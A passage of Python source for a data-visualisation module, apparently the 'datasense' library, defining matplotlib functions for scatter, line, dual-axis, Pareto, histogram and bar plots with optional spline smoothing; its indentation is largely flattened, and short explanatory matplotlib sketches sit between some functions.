>>> fig, ax = ds.plot_scatter_scatter_x1_x2_y1_y2(
>>> X1=series_x1,
>>> X2=series_x2,
>>> y1=series_y1,
>>> y2=series_y2,
>>> figsize=(8, 5),
>>> marker1='o',
>>> marker2='+',
>>> markersize1=8,
>>> markersize2=12,
>>> colour1='#cc3311',
>>> colour2='#ee3377',
>>> labellegendy1='y1',
>>> labellegendy2='y2',
>>> smoothing='natural_cubic_spline',
>>> number_knots=7
>>> )
>>> ax.legend(frameon=False)
>>> plt.show()
'''
fig = plt.figure(figsize=figsize)
ax = fig.add_subplot(111)
if smoothing is None:
        if X1.dtype in ['datetime64[ns]'] and X2.dtype in ['datetime64[ns]']:
format_dates(fig, ax)
ax.plot(
X1,
y1,
marker=marker1,
markersize=markersize1,
linestyle=linestyle1,
linewidth=linewidth1,
color=colour1,
label=labellegendy1
)
ax.plot(
X2,
y2,
marker=marker2,
markersize=markersize2,
linestyle=linestyle2,
linewidth=linewidth2,
color=colour2,
label=labellegendy2
)
elif smoothing == 'natural_cubic_spline':
        if X1.dtype in ['datetime64[ns]'] and X2.dtype in ['datetime64[ns]']:
XX1 = pd.to_numeric(X1)
XX2 = pd.to_numeric(X2)
fig.autofmt_xdate()
else:
XX1 = X1
XX2 = X2
model1 = natural_cubic_spline(
X=XX1,
y=y1,
number_knots=number_knots
)
model2 = natural_cubic_spline(
X=XX2,
y=y2,
number_knots=number_knots
)
ax.plot(
X1,
y1,
marker=marker1,
markersize=markersize1,
linestyle=linestyle1,
linewidth=linewidth1,
color=colour1,
label=labellegendy1
)
ax.plot(
X2,
y2,
marker=marker2,
markersize=markersize2,
linestyle=linestyle2,
linewidth=linewidth2,
color=colour2,
label=labellegendy2
)
ax.plot(
X1,
model1.predict(XX1),
marker=marker1,
markersize=0,
linestyle='-',
linewidth=linewidth1,
color=colour1
)
ax.plot(
X2,
model2.predict(XX2),
marker=marker2,
markersize=0,
linestyle='-',
linewidth=linewidth2,
color=colour2
)
return (fig, ax)
def plot_scatter_line_x_y1_y2(
X: pd.Series,
y1: pd.Series,
y2: pd.Series,
*,
figsize: Optional[Tuple[float, float]] = None,
smoothing: Optional[str] = None,
number_knots: Optional[int] = None,
colour1: Optional[str] = '#0077bb',
colour2: Optional[str] = '#33bbee',
labellegendy1: Optional[str] = None,
labellegendy2: Optional[str] = None
) -> Tuple[plt.Figure, axes.Axes]:
'''
Scatter plot of y1 versus X.
Line plot of y2 versus X.
Optional smoothing applied to y1, y2.
This graph is useful if y1 and y2 have the same units.
X: series for horizontal axis
y1: series for y1 to plot on vertical axis
y2: series for y2 to plot on vertical axis
smoothing: str
Optional: natural_cubic_spline
number_knots: positive integer
The number of knots to create.
If smoothing is applied, the series must not contain NaN, inf, or -inf.
    Fit a piecewise cubic function with the constraint that the fitted curve
    is linear outside the range of the knots. The fitted curve is continuously
    differentiable to the second order at all of the knots.
'''
fig = plt.figure(figsize=figsize)
ax = fig.add_subplot(111)
if smoothing is None:
if X.dtype in ['datetime64[ns]']:
format_dates(fig, ax)
ax.plot(
X,
y1,
marker='.',
linestyle='',
color=colour1,
label=labellegendy1
)
ax.plot(
X,
y2,
marker=None,
linestyle='-',
color=colour2,
label=labellegendy2
)
elif smoothing == 'natural_cubic_spline':
if X.dtype in ['datetime64[ns]']:
XX = pd.to_numeric(X)
fig.autofmt_xdate()
else:
XX = X
model1 = natural_cubic_spline(
X=XX,
y=y1,
number_knots=number_knots
)
model2 = natural_cubic_spline(
X=XX,
y=y2,
number_knots=number_knots
)
ax.plot(
X,
model1.predict(XX),
marker='.',
linestyle='',
color=colour1
)
ax.plot(
X,
model2.predict(XX),
marker=None,
linestyle='-',
color=colour2
)
return (fig, ax)
def plot_line_line_y1_y2(
y1: pd.Series,
y2: pd.Series,
*,
figsize: Optional[Tuple[float, float]] = None,
smoothing: Optional[str] = None,
number_knots: Optional[int] = None,
marker1: Optional[str] = '.',
marker2: Optional[str] = '.',
markersize1: Optional[int] = 8,
markersize2: Optional[int] = 8,
linestyle1: Optional[str] = '-',
linestyle2: Optional[str] = '-',
linewidth1: Optional[float] = 1,
linewidth2: Optional[float] = 1,
colour1: Optional[str] = '#0077bb',
colour2: Optional[str] = '#33bbee',
labellegendy1: Optional[str] = None,
labellegendy2: Optional[str] = None
) -> Tuple[plt.Figure, axes.Axes]:
"""
Line plot of y1 and y2.
Optional smoothing applied to y1 and y2.
y1 and y2 are of the same length.
y1 and y2 have the same units.
If smoothing is applied, the series must not contain NaN, inf, or -inf.
    Fit a piecewise cubic function with the constraint that the fitted curve
    is linear outside the range of the knots. The fitted curve is continuously
    differentiable to the second order at all of the knots.
Parameters
----------
y1 : pd.Series
The data to plot on the ordinate.
y2 : pd.Series
The data to plot on the ordinate.
figsize : Optional[Tuple[float, float]] = None
The (width, height) of the figure (in, in).
smoothing : Optional[str] = None
The type of smoothing to apply.
number_knots : Optional[int] = None
The number of knots for natural cubic spline smoothing.
marker1 : Optional[str] = '.'
The type of plot point for y1.
marker2 : Optional[str] = '.'
The type of plot point for y2.
markersize1 : Optional[int] = 8
The size of the plot point for y1.
markersize2 : Optional[int] = 8
The size of the plot point for y2.
    linestyle1 : Optional[str] = '-'
        The style of the line for y1.
    linestyle2 : Optional[str] = '-'
        The style of the line for y2.
    linewidth1 : Optional[float] = 1
        The width of the line for y1.
    linewidth2 : Optional[float] = 1
        The width of the line for y2.
colour1 : Optional[str] = '#0077bb'
The colour of the line for y1.
colour2 : Optional[str] = '#33bbee'
The colour of the line for y2.
labellegendy1 : Optional[str] = None
The legend label of the line y1.
labellegendy2 : Optional[str] = None
The legend label of the line y2.
Returns
-------
Tuple[plt.Figure, axes.Axes]
A matplotlib figure and Axes tuple.
Example
-------
>>> import matplotlib.pyplot as plt
>>> import datasense as ds
>>>
>>> series_y1 = ds.random_data()
>>> series_y2 = ds.random_data()
>>> fig, ax = ds.plot_line_line_y1_y2(
>>> y1=series_y1,
>>> y2=series_y2
>>> )
>>> plt.show()
"""
fig = plt.figure(figsize=figsize)
ax = fig.add_subplot(111)
X = pd.Series(range(1, y1.size + 1, 1))
if smoothing is None:
ax.plot(
X,
y1,
marker=marker1,
markersize=markersize1,
linestyle=linestyle1,
linewidth=linewidth1,
color=colour1,
label=labellegendy1
)
ax.plot(
X,
y2,
marker=marker2,
markersize=markersize2,
linestyle=linestyle2,
linewidth=linewidth2,
color=colour2,
label=labellegendy2
)
elif smoothing == 'natural_cubic_spline':
model1 = natural_cubic_spline(
X=X,
y=y1,
number_knots=number_knots
)
model2 = natural_cubic_spline(
X=X,
y=y2,
number_knots=number_knots
)
ax.plot(
X,
model1.predict(X),
marker=None,
linestyle='-',
color=colour1
)
ax.plot(
X,
model2.predict(X),
marker=None,
linestyle='-',
color=colour2
)
return (fig, ax)
def plot_line_line_x_y1_y2(
X: pd.Series,
y1: pd.Series,
y2: pd.Series,
*,
figsize: Optional[Tuple[float, float]] = None,
smoothing: Optional[str] = None,
number_knots: Optional[int] = None,
marker1: Optional[str] = '.',
marker2: Optional[str] = '.',
markersize1: Optional[int] = 8,
markersize2: Optional[int] = 8,
linestyle1: Optional[str] = '-',
linestyle2: Optional[str] = '-',
linewidth1: Optional[float] = 1,
linewidth2: Optional[float] = 1,
colour1: Optional[str] = '#0077bb',
colour2: Optional[str] = '#33bbee',
labellegendy1: Optional[str] = None,
labellegendy2: Optional[str] = None
) -> Tuple[plt.Figure, axes.Axes]:
'''
Line plot of y1 versus X.
Line plot of y2 versus X.
Optional smoothing applied to y1, y2.
This graph is useful if y1 and y2 have the same units.
X: series for horizontal axis
y1: series for y1 to plot on vertical axis
y2: series for y2 to plot on vertical axis
smoothing: str
Optional: natural_cubic_spline
number_knots: positive integer
The number of knots to create.
If smoothing is applied, the series must not contain NaN, inf, or -inf.
    Fit a piecewise cubic function with the constraint that the fitted curve
    is linear outside the range of the knots. The fitted curve is continuously
    differentiable to the second order at all of the knots.
'''
fig = plt.figure(figsize=figsize)
ax = fig.add_subplot(111)
if smoothing is None:
if X.dtype in ['datetime64[ns]']:
format_dates(fig, ax)
ax.plot(
X,
y1,
marker=marker1,
markersize=markersize1,
linestyle=linestyle1,
linewidth=linewidth1,
color=colour1,
label=labellegendy1
)
ax.plot(
X,
y2,
marker=marker2,
markersize=markersize2,
linestyle=linestyle2,
linewidth=linewidth2,
color=colour2,
label=labellegendy2
)
elif smoothing == 'natural_cubic_spline':
if X.dtype in ['datetime64[ns]']:
XX = pd.to_numeric(X)
fig.autofmt_xdate()
else:
XX = X
model1 = natural_cubic_spline(
X=XX,
y=y1,
number_knots=number_knots
)
model2 = natural_cubic_spline(
X=XX,
y=y2,
number_knots=number_knots
)
ax.plot(
X,
model1.predict(XX),
marker=None,
linestyle='-',
color=colour1
)
ax.plot(
X,
model2.predict(XX),
marker=None,
linestyle='-',
color=colour2
)
return (fig, ax)
def plot_line_line_line_x_y1_y2_y3(
X: pd.Series,
y1: pd.Series,
y2: pd.Series,
y3: pd.Series,
*,
figsize: Optional[Tuple[float, float]] = None,
smoothing: Optional[str] = None,
number_knots: Optional[int] = None,
colour1: Optional[str] = '#0077bb',
colour2: Optional[str] = '#33bbee',
colour3: Optional[str] = '#009988',
labellegendy1: Optional[str] = None,
labellegendy2: Optional[str] = None,
labellegendy3: Optional[str] = None
) -> Tuple[plt.Figure, axes.Axes]:
'''
Line plot of y1 versus X.
Line plot of y2 versus X.
Line plot of y3 versus X.
Optional smoothing applied to y1, y2, y3.
This graph is useful if y1, y2, and y3 have the same units.
X: series for horizontal axis
y1: series for y1 to plot on vertical axis
y2: series for y2 to plot on vertical axis
y3: series for y3 to plot on vertical axis
smoothing: str
Optional: natural_cubic_spline
number_knots: positive integer
The number of knots to create.
If smoothing is applied, the series must not contain NaN, inf, or -inf.
Fit a piecewise cubic function with the constraint that the fitted curve is
linear outside the range of the knots. The fitted curve is continuously
differentiable to the second order at all of the knots.
'''
fig = plt.figure(figsize=figsize)
ax = fig.add_subplot(111)
if smoothing is None:
if X.dtype in ['datetime64[ns]']:
format_dates(fig, ax)
ax.plot(
X,
y1,
marker=None,
linestyle='-',
color=colour1,
label=labellegendy1
)
ax.plot(
X,
y2,
marker=None,
linestyle='-',
color=colour2,
label=labellegendy2
)
ax.plot(
X,
y3,
marker=None,
linestyle='-',
color=colour3,
label=labellegendy3
)
elif smoothing == 'natural_cubic_spline':
if X.dtype in ['datetime64[ns]']:
XX = pd.to_numeric(X)
fig.autofmt_xdate()
else:
XX = X
model1 = natural_cubic_spline(
X=XX,
y=y1,
number_knots=number_knots
)
model2 = natural_cubic_spline(
X=XX,
y=y2,
number_knots=number_knots
)
model3 = natural_cubic_spline(
X=XX,
y=y3,
number_knots=number_knots
)
ax.plot(
X,
model1.predict(XX),
marker=None,
linestyle='-',
color=colour1
)
ax.plot(
X,
model2.predict(XX),
marker=None,
linestyle='-',
color=colour2
)
ax.plot(
X,
model3.predict(XX),
marker=None,
linestyle='-',
color=colour3
)
return (fig, ax)
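The function above is essentially three `ax.plot` calls on one Axes. The underlying matplotlib pattern, sketched with synthetic data on a headless backend (colours match the function defaults):

```python
import matplotlib
matplotlib.use("Agg")  # headless backend; no display needed for the sketch
import matplotlib.pyplot as plt
import pandas as pd

X = pd.Series(range(5))
y1, y2, y3 = X + 1, X * 2, X ** 2

fig = plt.figure()
ax = fig.add_subplot(111)
# One line per series, sharing the same horizontal axis.
for y, colour in ((y1, "#0077bb"), (y2, "#33bbee"), (y3, "#009988")):
    ax.plot(X, y, marker=None, linestyle="-", color=colour)
print(len(ax.lines))  # 3
```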
def plot_scatterleft_scatterright_x_y1_y2(
X: pd.Series,
y1: pd.Series,
y2: pd.Series,
*,
figsize: Optional[Tuple[float, float]] = None,
smoothing: Optional[str] = None,
number_knots: Optional[int] = None,
colour1: Optional[str] = '#0077bb',
colour2: Optional[str] = '#33bbee',
linestyle1: Optional[str] = 'None',
linestyle2: Optional[str] = 'None'
) -> Tuple[plt.Figure, axes.Axes, axes.Axes]:
'''
Scatter plot of y1 left vertical axis versus X.
Scatter plot of y2 right vertical axis versus X.
Optional smoothing applied to y1, y2.
This graph is useful if y1 and y2 have different units or scales,
and you wish to see if they are correlated.
X: series for horizontal axis
y1: series for y1 to plot using left vertical axis
y2: series for y2 to plot using right vertical axis
smoothing: str
Optional: natural_cubic_spline
number_knots: positive integer
The number of knots to create.
linestyle1 : Optional[str] = 'None'
The style of the line joining the points.
linestyle2 : Optional[str] = 'None'
The style of the line joining the points.
If smoothing is applied, the series must not contain NaN, inf, or -inf.
Fit a piecewise cubic function with the constraint that the fitted curve is
linear outside the range of the knots. The fitted curve is continuously
differentiable to the second order at all of the knots.
'''
fig = plt.figure(figsize=figsize)
ax1 = fig.add_subplot(111)
ax2 = ax1.twinx()
if smoothing is None:
if X.dtype in ['datetime64[ns]']:
format_dates(fig, ax1)
ax1.plot(
X,
y1,
marker='.',
linestyle=linestyle1,
color=colour1
)
ax2.plot(
X,
y2,
marker='.',
linestyle=linestyle2,
color=colour2
)
elif smoothing == 'natural_cubic_spline':
if X.dtype in ['datetime64[ns]']:
XX = pd.to_numeric(X)
fig.autofmt_xdate()
else:
XX = X
model1 = natural_cubic_spline(
X=XX,
y=y1,
number_knots=number_knots
)
model2 = natural_cubic_spline(
X=XX,
y=y2,
number_knots=number_knots
)
ax1.plot(
X,
model1.predict(XX),
marker='.',
linestyle=linestyle1,
color=colour1
)
ax2.plot(
X,
model2.predict(XX),
marker='.',
linestyle=linestyle2,
color=colour2
)
for tl in ax1.get_yticklabels():
tl.set_color(colour1)
for tl in ax2.get_yticklabels():
tl.set_color(colour2)
return (fig, ax1, ax2)
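The dual-axis layout above relies on `ax1.twinx()`, which adds a second y axis sharing the x axis; the tick-label loop then colours each axis to match its series. A self-contained sketch of that pattern with illustrative data:

```python
import matplotlib
matplotlib.use("Agg")  # headless backend for the sketch
import matplotlib.pyplot as plt

fig = plt.figure()
ax1 = fig.add_subplot(111)
ax2 = ax1.twinx()  # second y axis, same x axis
ax1.plot([0, 1, 2], [1, 4, 9], marker=".", linestyle="None", color="#0077bb")
ax2.plot([0, 1, 2], [100, 80, 60], marker=".", linestyle="None", color="#33bbee")
for tl in ax1.get_yticklabels():
    tl.set_color("#0077bb")  # left tick labels match the left series
print(len(fig.axes))  # 2
```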
def plot_lineleft_lineright_x_y1_y2(
X: pd.Series,
y1: pd.Series,
y2: pd.Series,
*,
figsize: Optional[Tuple[float, float]] = None,
smoothing: Optional[str] = None,
number_knots: Optional[int] = None,
colour1: Optional[str] = '#0077bb',
colour2: Optional[str] = '#33bbee',
linestyle1: Optional[str] = '-',
linestyle2: Optional[str] = '-',
marker1: Optional[str] = '.',
marker1size: Optional[float] = 8,
marker2: Optional[str] = '.',
marker2size: Optional[float] = 8,
) -> Tuple[plt.Figure, axes.Axes, axes.Axes]:
'''
Line plot of y1 left vertical axis versus X.
Line plot of y2 right vertical axis versus X.
Optional smoothing applied to y1, y2.
This graph is useful if y1 and y2 have different units or scales,
and you wish to see if they are correlated.
X: series for horizontal axis
y1: series for y1 to plot using left vertical axis
y2: series for y2 to plot using right vertical axis
smoothing: str
Optional: natural_cubic_spline
number_knots: positive integer
The number of knots to create.
linestyle1: Optional[str] = '-'
The style of the line joining the points.
linestyle2: Optional[str] = '-'
The style of the line joining the points.
If smoothing is applied, the series must not contain NaN, inf, or -inf.
Fit a piecewise cubic function with the constraint that the fitted curve is
linear outside the range of the knots. The fitted curve is continuously
differentiable to the second order at all of the knots.
'''
fig = plt.figure(figsize=figsize)
ax1 = fig.add_subplot(111)
ax2 = ax1.twinx()
if smoothing is None:
if X.dtype in ['datetime64[ns]']:
format_dates(fig, ax1)
ax1.plot(
X,
y1,
color=colour1,
marker=marker1,
markersize=marker1size
)
ax2.plot(
X,
y2,
color=colour2,
marker=marker2,
markersize=marker2size
)
elif smoothing == 'natural_cubic_spline':
if X.dtype in ['datetime64[ns]']:
XX = pd.to_numeric(X)
fig.autofmt_xdate()
else:
XX = X
model1 = natural_cubic_spline(
X=XX,
y=y1,
number_knots=number_knots
)
model2 = natural_cubic_spline(
X=XX,
y=y2,
number_knots=number_knots
)
ax1.plot(
X,
model1.predict(XX),
color=colour1,
linestyle=linestyle1
)
ax2.plot(
X,
model2.predict(XX),
color=colour2,
linestyle=linestyle2
)
for tl in ax1.get_yticklabels():
tl.set_color(colour1)
for tl in ax2.get_yticklabels():
tl.set_color(colour2)
return (fig, ax1, ax2)
def plot_barleft_lineright_x_y1_y2(
X: pd.Series,
y1: pd.Series,
y2: pd.Series,
*,
figsize: Optional[Tuple[float, float]] = None,
smoothing: Optional[str] = None,
number_knots: Optional[int] = None,
barwidth: Optional[float] = 10,
colour1: Optional[str] = '#0077bb',
colour2: Optional[str] = '#33bbee',
linestyle1: Optional[str] = '-',
linestyle2: Optional[str] = '-',
marker2: Optional[str] = 'o'
) -> Tuple[plt.Figure, axes.Axes, axes.Axes]:
'''
Bar plot of y1 left vertical axis versus X.
Line plot of y2 right vertical axis versus X.
Optional smoothing applied to y1, y2.
This graph is useful if y1 and y2 have different units or scales,
and you wish to see if they are correlated.
X: series for horizontal axis
y1: series for y1 to plot using left vertical axis
y2: series for y2 to plot using right vertical axis
smoothing: str
Optional: natural_cubic_spline
number_knots: positive integer
The number of knots to create.
linestyle1: Optional[str] = '-'
The style of the line joining the points.
linestyle2: Optional[str] = '-'
The style of the line joining the points.
If smoothing is applied, the series must not contain NaN, inf, or -inf.
Fit a piecewise cubic function with the constraint that the fitted curve is
linear outside the range of the knots. The fitted curve is continuously
differentiable to the second order at all of the knots.
'''
fig = plt.figure(figsize=figsize)
ax1 = fig.add_subplot(111)
ax2 = ax1.twinx()
if smoothing is None:
if X.dtype in ['datetime64[ns]']:
format_dates(fig, ax1)
ax1.bar(
X,
y1,
barwidth,
color=colour1
)
ax2.plot(
X,
y2,
color=colour2,
marker=marker2
)
elif smoothing == 'natural_cubic_spline':
if X.dtype in ['datetime64[ns]']:
XX = pd.to_numeric(X)
fig.autofmt_xdate()
else:
XX = X
model1 = natural_cubic_spline(
X=XX,
y=y1,
number_knots=number_knots
)
model2 = natural_cubic_spline(
X=XX,
y=y2,
number_knots=number_knots
)
ax1.plot(
X,
model1.predict(XX),
color=colour1,
linestyle=linestyle1
)
ax2.plot(
X,
model2.predict(XX),
color=colour2,
linestyle=linestyle2
)
for tl in ax1.get_yticklabels():
tl.set_color(colour1)
for tl in ax2.get_yticklabels():
tl.set_color(colour2)
return (fig, ax1, ax2)
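`plot_barleft_lineright_x_y1_y2` combines `ax1.bar` with `ax2.plot` on twinned axes: the bars become `Rectangle` patches on the left axis while the line lives on the right. A minimal sketch of that combination with made-up data:

```python
import matplotlib
matplotlib.use("Agg")  # headless backend for the sketch
import matplotlib.pyplot as plt

fig = plt.figure()
ax1 = fig.add_subplot(111)
ax2 = ax1.twinx()
ax1.bar(["a", "b", "c"], [3, 1, 2], 0.5, color="#0077bb")  # bars, left axis
ax2.plot(["a", "b", "c"], [10, 20, 15], color="#33bbee", marker="o")  # line, right axis
print(len(ax1.patches), len(ax2.lines))  # 3 1
```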
def plot_pareto(
X: pd.Series,
y: pd.Series,
*,
figsize: Optional[Tuple[float, float]] = None,
width: Optional[float] = 0.8,
colour1: Optional[str] = '#0077bb',
colour2: Optional[str] = '#33bbee',
marker: Optional[str] = '.',
markersize: Optional[float] = 8,
linestyle: Optional[str] = '-',
) -> Tuple[plt.Figure, axes.Axes, axes.Axes]:
"""
X : pd.Series
The data to plot on the abscissa.
y : pd.Series
The data to plot on the ordinate.
figsize : Optional[Tuple[float, float]] = None
The (width, height) of the figure (in, in).
width : Optional[float] = 0.8
The width of the bars (in).
colour1 : Optional[str] = '#0077bb'
The colour of the line for y1.
colour2 : Optional[str] = '#33bbee'
The colour of the line for y2.
marker : Optional[str] = '.'
The type of plot point.
markersize : Optional[float] = 8
The size of the plot point (pt).
linestyle : Optional[str] = '-'
The style of the line joining the points.
Returns
-------
Tuple[plt.Figure, axes.Axes, axes.Axes]
A matplotlib figure and two axes (bar axis, cumulative-percentage axis).
Examples
--------
Example 1
>>> import matplotlib.pyplot as plt
>>> import pandas as pd
>>> import datasense as ds
>>> data = pd.DataFrame(
>>> {
>>> 'ordinate': ['Mo', 'Larry', 'Curly', 'Shemp', 'Joe'],
>>> 'abscissa': [21, 2, 10, 4, 16]
>>> }
>>> )
>>> fig, ax1, ax2 = ds.plot_pareto(
>>> X=data['ordinate'],
>>> y=data['abscissa']
>>> )
>>> plt.show()
"""
df = pd.concat(
[X, y],
axis=1
).sort_values(
by=y.name,
axis=0,
ascending=False,
kind='mergesort'
)
total_y = df[y.name].sum()
df['percentage'] = df[y.name] / total_y * 100
df['cumulative_percentage'] = df['percentage'].cumsum(skipna=True)
fig = plt.figure(figsize=figsize)
ax1 = fig.add_subplot(111)
ax2 = ax1.twinx()
ax1.bar(
x=df[X.name],
height=df[y.name],
width=width,
color=colour1
)
ax2.plot(
df[X.name],
df['cumulative_percentage'],
marker=marker,
markersize=markersize,
linestyle=linestyle,
color=colour2
)
return (fig, ax1, ax2)
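The cumulative-percentage column drives the Pareto line: sort the values in descending order, convert each to a percentage of the total, then take the running sum. The arithmetic in isolation, using the docstring's example data:

```python
import pandas as pd

y = pd.Series([21, 2, 10, 4, 16], name="abscissa")
df = y.sort_values(ascending=False).to_frame()
df["percentage"] = df["abscissa"] / df["abscissa"].sum() * 100
df["cumulative_percentage"] = df["percentage"].cumsum()
# The running sum climbs to 100 % over the sorted categories.
print(round(df["cumulative_percentage"].iloc[-1]))  # 100
```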
def format_dates(
fig: plt.Figure,
ax: axes.Axes
) -> None:
'''
Format dates and ticks for plotting.
'''
loc = mdates.AutoDateLocator()
fmt = mdates.AutoDateFormatter(loc)
ax.xaxis.set_major_locator(loc)
ax.xaxis.set_major_formatter(fmt)
fig.autofmt_xdate()
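`format_dates` pairs `AutoDateLocator` with `AutoDateFormatter` so tick density and label format are chosen together, then rotates the labels. The same setup stand-alone, on a headless backend:

```python
import matplotlib
matplotlib.use("Agg")  # headless backend for the sketch
import matplotlib.dates as mdates
import matplotlib.pyplot as plt

fig = plt.figure()
ax = fig.add_subplot(111)
loc = mdates.AutoDateLocator()
ax.xaxis.set_major_locator(loc)
ax.xaxis.set_major_formatter(mdates.AutoDateFormatter(loc))
fig.autofmt_xdate()  # rotate the date labels so they stay readable
print(type(ax.xaxis.get_major_locator()).__name__)  # AutoDateLocator
```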
def probability_plot(
data: pd.Series,
*,
figsize: Optional[Tuple[float, float]] = None,
distribution: Optional[object] = norm,
fit: Optional[bool] = True,
plot: Optional[object] = None,
colour1: Optional[str] = '#0077bb',
colour2: Optional[str] = '#33bbee'
) -> Tuple[plt.Figure, axes.Axes]:
"""
Plot a probability plot of data against the quantiles of a specified
theoretical distribution.
Parameters
----------
data : pd.Series
A pandas Series.
figsize : Optional[Tuple[float, float]]
The (width, height) of the figure (in, in).
distribution : Optional[object] = norm
Fit a normal distribution by default.
fit : Optional[bool] = True
Fit a least-squares regression line to the data if True.
plot : Optional[object] = None
If given, plot the quantiles and least-squares fit.
Returns
-------
Tuple[plt.Figure, axes.Axes]
A matplotlib figure and Axes tuple.
Example
-------
>>> import matplotlib.pyplot as plt
>>> import datasense as ds
>>>
>>> data = ds.random_data()
>>> fig, ax = ds.probability_plot(data=data)
>>> plt.show()
"""
fig = plt.figure(figsize=figsize)
ax = fig.add_subplot(111)
(osm, osr), (slope, intercept, r) = probplot(
x=data,
dist=distribution,
fit=fit,
plot=ax
)
ax.get_lines()[0].set_markerfacecolor(colour1)
ax.get_lines()[0].set_markeredgecolor(colour1)
ax.get_lines()[1].set_color(colour2)
return (fig, ax)
def despine(ax: axes.Axes) -> None:
"""
Remove the top and right spines of a graph.
Parameters
----------
ax : axes.Axes
Example
-------
>>> despine(ax)
"""
for spine in 'right', 'top':
ax.spines[spine].set_visible(False)
def plot_histogram(
s: pd.Series,
*,
number_bins: Optional[int] = None,
bin_range: Optional[Tuple[int, int]] = None,
figsize: Optional[Tuple[int, int]] = (8, 6),
bin_width: Optional[int] = None,
edgecolor: Optional[str] = '#ffffff',
linewidth: Optional[int] = 1,
bin_label_bool: Optional[bool] = False,
color: Optional[str] = '#0077bb'
) -> Tuple[plt.Figure, axes.Axes]:
"""
Parameters
----------
s : pd.Series
The input series.
number_bins : Optional[int] = None
The number of equal-width bins in the range s.max() - s.min().
bin_range : Optional[Tuple[int, int]] = None,
The lower and upper range of the bins. If not provided, range is
(s.min(), s.max()).
figsize : Optional[Tuple[int, int]] = (8, 6),
The figure size width, height (inch).
bin_width : Optional[int] = None,
The width of the bin in same units as the series s.
edgecolor : Optional[str] = '#ffffff',
The hexadecimal color value for the bar edges.
linewidth : Optional[int] = 1,
The bar edges line width (point).
bin_label_bool : Optional[bool] = False
If True, label the bars with count and percentage of total.
color : Optional[str] = '#0077bb'
The color of the bar faces.
Returns
-------
fig, ax : Tuple[plt.Figure, axes.Axes]
Examples
--------
Example 1
# Create a series of random floats, normal distribution,
# with the default parameters.
>>> import datasense as ds
>>> s = ds.random_data()
>>> fig, ax = ds.plot_histogram(s=s)
Example 2
# Create a series of random integers, integer distribution, size = 113,
# min = 0, max = 13.
>>> import datasense as ds
>>> s = ds.random_data(
>>> distribution='randint',
>>> size=113,
>>> low=0,
>>> high=14
>>> )
>>> fig, ax = ds.plot_histogram(s=s)
Example 3
# Create a series of random integers, integer distribution, size = 113,
# min = 0, max = 13.
# Set histogram parameters to control bin width.
>>> s = ds.random_data(
>>> distribution='randint',
>>> size=113,
>>> low=0,
>>> high=14
>>> )
>>> fig, ax = ds.plot_histogram(
>>> s=s,
>>> bin_width=1
>>> )
Example 4
# Create a series of random integers, integer distribution, size = 113,
# min = 0, max = 12.
# Set histogram parameters to control bin width and plotting range.
>>> s = ds.random_data(
>>> distribution='randint',
>>> size=113,
>>> low=0,
>>> high=13
>>> )
>>> fig, ax = ds.plot_histogram(
>>> s=s,
>>> bin_width=1,
>>> bin_range=(0, 10)
>>> )
Example 5
# Create a series of random floats, size = 113,
# average = 69, standard deviation = 13.
# Set histogram parameters to control bin width and plotting range.
>>> s = ds.random_data(
>>> distribution='norm',
>>> size=113,
>>> loc=69,
>>> scale=13
>>> )
>>> fig, ax = ds.plot_histogram(
>>> s=s,
>>> bin_width=5,
>>> bin_range=(30, 110)
>>> )
Example 6
# Create a series of random floats, size = 113,
# average = 69, standard deviation = 13.
# Set histogram parameters to control bin width, plotting range, labels.
# Set colour of the bars.
>>> s = ds.random_data(
>>> distribution='norm',
>>> size=113,
>>> loc=69,
>>> scale=13
>>> )
>>> fig, ax = ds.plot_histogram(
>>> s=s,
>>> bin_width=5,
>>> bin_range=(30, 110),
>>> figsize=(10,8),
>>> bin_label_bool=True,
>>> color='#33bbee'
>>> )
"""
fig = plt.figure(figsize=figsize)
ax = fig.add_subplot(111)
if bin_width and not bin_range:
x = (s.max() - s.min()) / bin_width
number_bins = math.ceil(x)
elif bin_width and bin_range:
number_bins = int((bin_range[1] - bin_range[0]) / bin_width)
counts, bins, patches = ax.hist(
x=s,
bins=number_bins,
range=bin_range,
edgecolor=edgecolor,
linewidth=linewidth,
color=color
)
if bin_label_bool:
ax.set_xticks(bins)
ax.xaxis.set_major_formatter(FormatStrFormatter('%0.0f'))
bin_centers = 0.5 * np.diff(bins) + bins[:-1]
for count, x in zip(counts, bin_centers):
ax.annotate(
text=f'{str(int(count))}',
xy=(x, 0),
xytext=(0, -18),
xycoords=(
'data',
'axes fraction'
),
textcoords='offset points',
va='top',
ha='center'
)
percent = f'{(100 * float(count) / counts.sum()):0.0f} %'
ax.annotate(
text=percent,
xy=(x, 0),
xytext=(0, -32),
xycoords=(
'data',
'axes fraction'
),
textcoords='offset points',
va='top',
ha='center'
)
return (fig, ax)
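When `bin_width` is given without `bin_range`, the bin count is the data span divided by the width, rounded up; with a range, it is the integer quotient of the range span. The width-only arithmetic, using the numbers from Example 5:

```python
import math

s_min, s_max, bin_width = 30.0, 110.0, 5
# ceil so a partial final bin still gets its own bar
number_bins = math.ceil((s_max - s_min) / bin_width)
print(number_bins)  # 16
```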
def plot_horizontal_bars(
y: Union[List[int], List[float], List[str]],
width: Union[List[int], List[float]],
*,
height: Optional[float] = 0.8,
figsize: Optional[Tuple[int, int]] = (8, 6),
edgecolor: Optional[str] = '#ffffff',
linewidth: Optional[int] = 1,
color: Optional[str] = '#0077bb'
) -> Tuple[plt.Figure, axes.Axes]:
"""
Parameters
----------
y : Union[List[int], List[float], List[str]],
The y coordinates of the bars.
width : Union[List[int], List[float]],
The width(s) of the bars.
height : Optional[float] = 0.8,
The height of the bars.
figsize : Optional[Tuple[int, int]] = (8, 6),
The figure size width, height (inch).
edgecolor : Optional[str] = '#ffffff',
The hexadecimal color value for the bar edges.
linewidth : Optional[int] = 1,
The bar edges line width (point).
color : Optional[str] = '#0077bb'
The color of the bar faces.
Returns
-------
fig, ax : Tuple[plt.Figure, axes.Axes]
Examples
--------
Example 1
>>> import datasense as ds
>>> y = ['Yes', 'No']
>>> width = [69, 31]
>>> fig, ax = ds.plot_horizontal_bars(
>>> y=y,
>>> width=width
>>> )
Example 2
>>> y = ['Yes', 'No']
>>> width = [69, 31]
>>> fig, ax = ds.plot_horizontal_bars(
>>> y=y,
>>> width=width,
>>> height=0.4
>>> )
"""
fig = plt.figure(figsize=figsize)
ax = fig.add_subplot(111)
ax.barh(
y=y,
width=width,
height=height,
edgecolor=edgecolor,
linewidth=linewidth,
color=color
)
return (fig, ax)
def plot_vertical_bars(
x: Union[List[int], List[float], List[str]],
height: Union[List[int], List[float]],
*,
width: Optional[float] = 0.8,
figsize: Optional[Tuple[int, int]] = (8, 6),
edgecolor: Optional[str] = '#ffffff',
